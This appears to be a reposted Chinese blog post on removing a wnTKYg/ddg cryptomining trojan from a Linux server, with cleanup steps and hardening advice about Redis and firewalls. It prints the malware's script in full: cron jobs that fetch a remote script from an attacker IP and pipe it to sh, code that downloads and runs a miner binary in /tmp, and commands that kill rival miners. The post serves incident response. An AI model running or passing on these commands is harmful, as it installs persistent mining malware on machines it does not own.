码迷,mamicode.com
首页 > 其他好文 > 详细

清除wnTKYg 挖矿工木马的过程

时间:2017-12-15 12:34:29      阅读:168      评论:0      收藏:0      [点我收藏+]

标签:脚本   bin   img   守护   内网   fss   加固   图片   接口   

*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh
*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh

发现服务器CPU占用率超100,先不要着急删除文件,确定文件目录

查看挖矿脚本

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/5 * * * * curl -fsSL 
http://218.248.40.228:8443/i.sh | sh" > /var/spool/cron/root
echo "*/5 * * * * wget -q -O- 
http://218.248.40.228:8443/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL 
http://218.248.40.228:8443/i.sh | sh" > /var/spool/cron/crontabs/root
echo "*/5 * * * * wget -q -O- 
http://218.248.40.228:8443/i.sh | sh" >> /var/spool/cron/crontabs/root

if [ ! -f "/tmp/ddg.2021" ]; then
    curl -fsSL --compressed 
http://218.248.40.228:8443/2021/ddg.$(uname -m) -o /tmp/ddg.2021
fi

if [ ! -f "/tmp/ddg.2021" ]; then
    wget -q 
http://218.248.40.228:8443/2021/ddg.$(uname -m) -O /tmp/ddg.2021
fi

chmod +x /tmp/ddg.2021 && /tmp/ddg.2021


ps auxf | grep -v grep | grep Circle_MI | awk ‘{print $2}‘ | xargs kill
ps auxf | grep -v grep | grep 
get.bi-chi.com | awk ‘{print $2}‘ | xargs kill
ps auxf | grep -v grep | grep 
hashvault.pro | awk ‘{print $2}‘ | xargs kill
ps auxf | grep -v grep | grep 
nanopool.org | awk ‘{print $2}‘ | xargs kill
ps auxf | grep -v grep | grep 
minexmr.com | awk ‘{print $2}‘ | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk ‘{print $2}‘ | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk ‘{print $2}‘ | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk ‘{print $2}‘ | kill

根据上边的脚本清楚定时任务

top查看 CPU299%

技术分享图片

ps -ef | grep  wnTKYg

发现在 tmp目录下生成两个文件imWBR1\wnTKYg: 删除这两个文件并把进程kill掉,

观察两分钟后发现还会自动启动

继续检查和网上搜索,发现一般这个挖矿还有守护进程一般命名为,ddg*   ,ps  -ef | grep ddg 发现果然有这个,查看他的启动目指向/tmp下

去tmp下删除相关文件并kill掉进程,top继续观察,,,,终于解决。。。。

技术分享图片

 

网上查询的贴都说是因为redis,未加密引起的。以后注意,对redis进行指定内网IP请求,防火墙限制挖矿地址出入屏蔽掉,对系统文件和应用的接口和权限也要加固。

欢迎随时沟通

清除wnTKYg 挖矿工木马的过程

标签:脚本   bin   img   守护   内网   fss   加固   图片   接口   

原文地址:http://www.cnblogs.com/wplong/p/8042181.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!